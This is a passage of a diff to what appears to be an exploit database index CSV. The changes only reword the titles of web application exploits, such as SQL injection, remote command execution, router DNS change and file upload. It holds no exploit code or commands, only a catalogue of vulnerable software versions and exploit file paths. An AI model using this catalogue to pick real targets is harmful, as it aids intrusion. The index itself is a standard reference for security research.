ADSL Router - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 29334,exploits/cfm/webapps/29334.txt,"Future Internet - 'index.cfm' Multiple SQL Injections",2006-12-23,Linux_Drox,webapps,cfm, 29335,exploits/cfm/webapps/29335.txt,"Future Internet - 'index.cfm?categoryId' Cross-Site Scripting",2006-12-23,Linux_Drox,webapps,cfm, 29336,exploits/asp/webapps/29336.txt,"Chatwm 1.0 - 'SelGruFra.asp' SQL Injection",2006-12-24,ShaFuq31,webapps,asp, @@ -31262,7 +31263,7 @@ id,file,description,date,author,type,platform,port 29413,exploits/php/webapps/29413.txt,"Magic Photo Storage Website - '/admin/delete_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, 29414,exploits/php/webapps/29414.txt,"Magic Photo Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, 29415,exploits/php/webapps/29415.txt,"Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, -40369,exploits/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40369,exploits/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 29416,exploits/php/webapps/29416.txt,"Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, 29417,exploits/php/webapps/29417.txt,"Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, 29418,exploits/php/webapps/29418.txt,"Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,webapps,php, @@ -31311,7 +31312,7 @@ id,file,description,date,author,type,platform,port 29488,exploits/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, 29489,exploits/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,webapps,php, 29491,exploits/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,webapps,php, -40368,exploits/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +40368,exploits/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 29492,exploits/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,webapps,php, 29497,exploits/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,webapps,php, 29498,exploits/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,webapps,php, @@ -33159,7 +33160,7 @@ id,file,description,date,author,type,platform,port 32432,exploits/php/webapps/32432.txt,"ClickBank Portal - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",webapps,php, 32433,exploits/php/webapps/32433.txt,"Membership Script - Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",webapps,php, 32434,exploits/php/webapps/32434.txt,"Recipe Script - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",webapps,php, -32437,exploits/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated Remote Code Execution",2014-03-22,"Brandon Perry",webapps,php, +32437,exploits/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - (Authenticated) Remote Code Execution",2014-03-22,"Brandon Perry",webapps,php, 32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php, 32443,exploits/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",webapps,php, 32444,exploits/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",webapps,php, @@ -33225,7 +33226,7 @@ id,file,description,date,author,type,platform,port 32542,exploits/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,webapps,php, 32543,exploits/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,webapps,php, 32544,exploits/php/webapps/32544.txt,"KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,webapps,php, -32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80 +32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80 32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php, 32547,exploits/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,webapps,php, 32549,exploits/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,webapps,asp, @@ -33278,7 +33279,7 @@ id,file,description,date,author,type,platform,port 32619,exploits/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,webapps,ios,52789 32620,exploits/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,webapps,ios,8080 32622,exploits/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",webapps,php,80 -32623,exploits/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XML External Entity Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",webapps,multiple, +32623,exploits/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - XML External Entity Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",webapps,multiple, 32624,exploits/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' SQL Injection",2008-12-01,Pouya_Server,webapps,php, 32625,exploits/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, 32626,exploits/asp/webapps/32626.txt,"ASP Forum Script - 'messages.asp?message_id' SQL Injection",2008-12-01,Pouya_Server,webapps,asp, @@ -33298,7 +33299,7 @@ id,file,description,date,author,type,platform,port 32640,exploits/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,webapps,php, 32641,exploits/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,webapps,php, 32642,exploits/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",webapps,php, -32644,exploits/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",webapps,php,443 +32644,exploits/php/webapps/32644.txt,"Alienvault 4.5.0 - (Authenticated) SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",webapps,php,443 32645,exploits/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Remote Command Execution",2008-12-06,"Troy Bollinge",webapps,php, 32646,exploits/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",webapps,php, 32647,exploits/php/webapps/32647.txt,"PrestaShop 1.1 - '/admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, @@ -33490,7 +33491,7 @@ id,file,description,date,author,type,platform,port 33003,exploits/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,webapps,php,80 33004,exploits/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read",2014-04-24,Portcullis,webapps,php,80 33005,exploits/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",webapps,php,80 -33006,exploits/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",webapps,php,443 +33006,exploits/php/webapps/33006.txt,"Alienvault 4.3.1 - SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",webapps,php,443 33008,exploits/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injections",2009-05-22,Securitylab.ir,webapps,php, 33009,exploits/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",webapps,asp, 33011,exploits/php/webapps/33011.txt,"PHP-Nuke 8.0 - '/main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",webapps,php, @@ -33624,7 +33625,7 @@ id,file,description,date,author,type,platform,port 33281,exploits/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",webapps,php, 33282,exploits/php/webapps/33282.txt,"Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,webapps,php, 33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple, -33317,exploits/php/webapps/33317.txt,"Alienvault Open Source SIEM (OSSIM) 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",webapps,php,443 +33317,exploits/php/webapps/33317.txt,"Alienvault Open Source SIEM (OSSIM) 4.6.1 - (Authenticated) SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",webapps,php,443 33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",webapps,java, 33287,exploits/php/webapps/33287.txt,"BloofoxCMS 0.3.5 - 'search' Cross-Site Scripting",2009-10-15,"drunken danish rednecks",webapps,php, 33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php, @@ -33662,7 +33663,7 @@ id,file,description,date,author,type,platform,port 33361,exploits/asp/webapps/33361.txt,"JiRo's (Multiple Products) - '/files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,webapps,asp, 33362,exploits/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' SQL Injection",2009-11-19,"Sangte Amtham",webapps,php, 33365,exploits/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Cross-Site Scripting",2009-11-29,MustLive,webapps,php, -40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,webapps,php, +40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,webapps,php, 33366,exploits/php/webapps/33366.txt,"WordPress Plugin Trashbin 0.1 - 'mtb_undelete' Cross-Site Scripting",2009-11-15,MustLive,webapps,php, 33367,exploits/php/webapps/33367.txt,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,webapps,php, 33368,exploits/php/webapps/33368.html,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,webapps,php, @@ -33920,7 +33921,7 @@ id,file,description,date,author,type,platform,port 34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php, 34147,exploits/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Cross-Site Scripting",2010-06-06,"Adam Baldwin",webapps,php, 33866,exploits/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,webapps,hardware, -33867,exploits/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution",2014-06-25,LiquidWorm,webapps,php, +33867,exploits/php/webapps/33867.txt,"Lunar CMS 3.3 - Remote Command Execution",2014-06-25,LiquidWorm,webapps,php, 34142,exploits/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injections",2010-06-14,"High-Tech Bridge SA",webapps,php, 33870,exploits/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Cross-Site Scripting",2010-04-22,Valentin,webapps,php, 33874,exploits/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",webapps,php, @@ -34133,7 +34134,7 @@ id,file,description,date,author,type,platform,port 34238,exploits/php/webapps/34238.txt,"Sphider Search Engine - Multiple Vulnerabilities",2014-08-02,"Shayan S",webapps,php,80 34239,exploits/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",webapps,php,80 34240,exploits/ios/webapps/34240.txt,"TigerCom iFolder+ 1.2 iOS - Multiple Vulnerabilities",2014-08-02,Vulnerability-Lab,webapps,ios,8080 -34241,exploits/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - Authenticated Admin Privilege Escalation",2014-08-02,mra,webapps,linux,8080 +34241,exploits/linux/webapps/34241.txt,"ISPConfig 3.0.54p1 - (Authenticated) Admin Privilege Escalation",2014-08-02,mra,webapps,linux,8080 34336,exploits/php/webapps/34336.html,"WordPress Plugin Disqus 2.7.5 - Cross-Site Request Forgery (Admin Persistent) / Cross-Site Scripting",2014-08-14,"Nik Cubrilovic",webapps,php,80 34337,exploits/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, 34338,exploits/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",webapps,php, @@ -34261,9 +34262,9 @@ id,file,description,date,author,type,platform,port 34444,exploits/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,webapps,php, 34445,exploits/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php, 34446,exploits/php/webapps/34446.txt,"LiveStreet 0.2 - '/include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,webapps,php, -34447,exploits/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,webapps,php,80 +34447,exploits/php/webapps/34447.py,"Plogger 1.0-RC1 - (Authenticated) Arbitrary File Upload",2014-08-28,b0z,webapps,php,80 34449,exploits/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",webapps,multiple, -34450,exploits/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 +34450,exploits/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 34451,exploits/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 34452,exploits/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",webapps,php,80 34453,exploits/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,webapps,php, @@ -34304,7 +34305,7 @@ id,file,description,date,author,type,platform,port 34514,exploits/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",webapps,php,80 34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp, 34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400 -34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80 +34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80 34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple, 34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php, 34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,webapps,php, @@ -34313,7 +34314,7 @@ id,file,description,date,author,type,platform,port 34534,exploits/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php, 34535,exploits/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php, 34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php, -34538,exploits/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,webapps,php,80 +34538,exploits/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Configuration Access",2014-09-05,Hannaichi,webapps,php,80 34539,exploits/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",webapps,php,80 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php, 34543,exploits/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - 'parameters.php?device' Cross-Site Scripting",2010-08-31,"Mr Teatime",webapps,php, @@ -34422,7 +34423,7 @@ id,file,description,date,author,type,platform,port 34677,exploits/php/webapps/34677.txt,"WebStatCaffe - '/stat/pageviewers.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, 34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, 34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, -34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware, +34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware, 34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",webapps,php, 34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,webapps,ios,8080 34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,webapps,asp, @@ -34533,7 +34534,7 @@ id,file,description,date,author,type,platform,port 34833,exploits/php/webapps/34833.txt,"Joomla! / Mambo Component com_trade - 'PID' Cross-Site Scripting",2010-10-11,FL0RiX,webapps,php, 34834,exploits/jsp/webapps/34834.txt,"Oracle Fusion Middleware 10.1.2/10.1.3 - BPEL Console Cross-Site Scripting",2010-10-12,"Alexander Polyakov",webapps,jsp, 34837,exploits/php/webapps/34837.txt,"Joomla! Component Jstore - 'Controller' Local File Inclusion",2010-10-13,jos_ali_joe,webapps,php, -34839,exploits/cgi/webapps/34839.py,"IPFire - Cgi Web Interface Authenticated Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",webapps,cgi, +34839,exploits/cgi/webapps/34839.py,"IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection",2014-10-01,"Claudio Viviani",webapps,cgi, 34840,exploits/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",webapps,php, 34841,exploits/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",webapps,php, 34842,exploits/php/webapps/34842.txt,"TWiki 5.0 - '/bin/view?rev' Cross-Site Scripting",2010-10-14,"DOUHINE Davy",webapps,php, @@ -34619,7 +34620,7 @@ id,file,description,date,author,type,platform,port 34965,exploits/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-10-14,"Krusty Hack",webapps,php, 34968,exploits/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,webapps,php, 34969,exploits/hardware/webapps/34969.html,"Tenda A32 Router - Cross-Site Request Forgery",2014-10-14,zixian,webapps,hardware, -34970,exploits/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",webapps,php, +34970,exploits/php/webapps/34970.py,"SEO Control Panel 3.6.0 - (Authenticated) SQL Injection",2014-10-14,"Tiago Carvalho",webapps,php, 34971,exploits/asp/webapps/34971.txt,"Angel Learning Management System 7.3 - 'pdaview.asp' Cross-Site Scripting",2010-11-05,"Wesley Kerfoot",webapps,asp, 34972,exploits/php/webapps/34972.txt,"Joomla! Component AutoArticles 3000 - SQL Injection",2010-11-05,jos_ali_joe,webapps,php, 34973,exploits/php/webapps/34973.txt,"WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting",2010-11-08,"John Leitch",webapps,php, @@ -34693,8 +34694,8 @@ id,file,description,date,author,type,platform,port 35098,exploits/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,webapps,php,80 35099,exploits/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XML External Entity File Disclosure",2014-10-28,Portcullis,webapps,php,80 35100,exploits/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,webapps,php,80 -35102,exploits/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection",2014-10-28,tintinweb,webapps,php,80 -35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple, +35102,exploits/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Blind SQL Injection",2014-10-28,tintinweb,webapps,php,80 +35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple, 35209,exploits/jsp/webapps/35209.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",webapps,jsp, 35106,exploits/php/webapps/35106.txt,"Cetera eCommerce - 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,webapps,php, 35107,exploits/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",webapps,cfm, @@ -34841,7 +34842,7 @@ id,file,description,date,author,type,platform,port 35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php, 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php, 35340,exploits/php/webapps/35340.txt,"WordPress Plugin wpDataTables 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",webapps,php, -35341,exploits/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",webapps,php, +35341,exploits/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Arbitrary File Upload",2014-11-24,"Claudio Viviani",webapps,php, 35343,exploits/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,webapps,php, 35344,exploits/php/webapps/35344.txt,"RobotStats 1.0 - 'robot' SQL Injection",2014-11-24,"ZoRLu Bugrahan",webapps,php, 35346,exploits/php/webapps/35346.txt,"WordPress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",webapps,php, @@ -34967,7 +34968,7 @@ id,file,description,date,author,type,platform,port 35562,exploits/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",webapps,php, 35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php, 35556,exploits/hardware/webapps/35556.txt,"CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,webapps,hardware, -35543,exploits/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",webapps,php, +35543,exploits/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload",2014-12-15,"Claudio Viviani",webapps,php, 35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php, 35550,exploits/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",webapps,php, 35551,exploits/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Persistent Cross-Site Scripting",2014-12-16,"Steffen Rösemann",webapps,php,80 @@ -35009,7 +35010,7 @@ id,file,description,date,author,type,platform,port 35621,exploits/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections",2011-04-16,KedAns-Dz,webapps,php, 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple, 35624,exploits/php/webapps/35624.txt,"phpList 3.0.6/3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,php, -35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",webapps,php, +35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - (Authenticated) SQL Injection",2014-12-27,"xd4rker dark",webapps,php, 35626,exploits/php/webapps/35626.txt,"Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",webapps,php, 35629,exploits/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusions",2011-04-16,KedAns-Dz,webapps,php, 35630,exploits/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,webapps,php, @@ -35293,7 +35294,7 @@ id,file,description,date,author,type,platform,port 36099,exploits/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",webapps,php,80 36102,exploits/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,webapps,php, 36103,exploits/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,webapps,php, -36105,exploits/hardware/webapps/36105.sh,"D-Link DSL-2640B ADSL Router - 'ddnsmngr' Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",webapps,hardware, +36105,exploits/hardware/webapps/36105.sh,"D-Link DSL-2640B ADSL Router - 'ddnsmngr' Remote DNS Change",2015-02-18,"Todor Donev",webapps,hardware, 36106,exploits/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,webapps,php, 36107,exploits/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,webapps,php, 36108,exploits/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,webapps,php, @@ -35368,7 +35369,7 @@ id,file,description,date,author,type,platform,port 36197,exploits/php/webapps/36197.txt,"ezCourses - 'admin.asp' Security Bypass",2011-10-01,J.O,webapps,php, 36200,exploits/php/webapps/36200.txt,"Netvolution 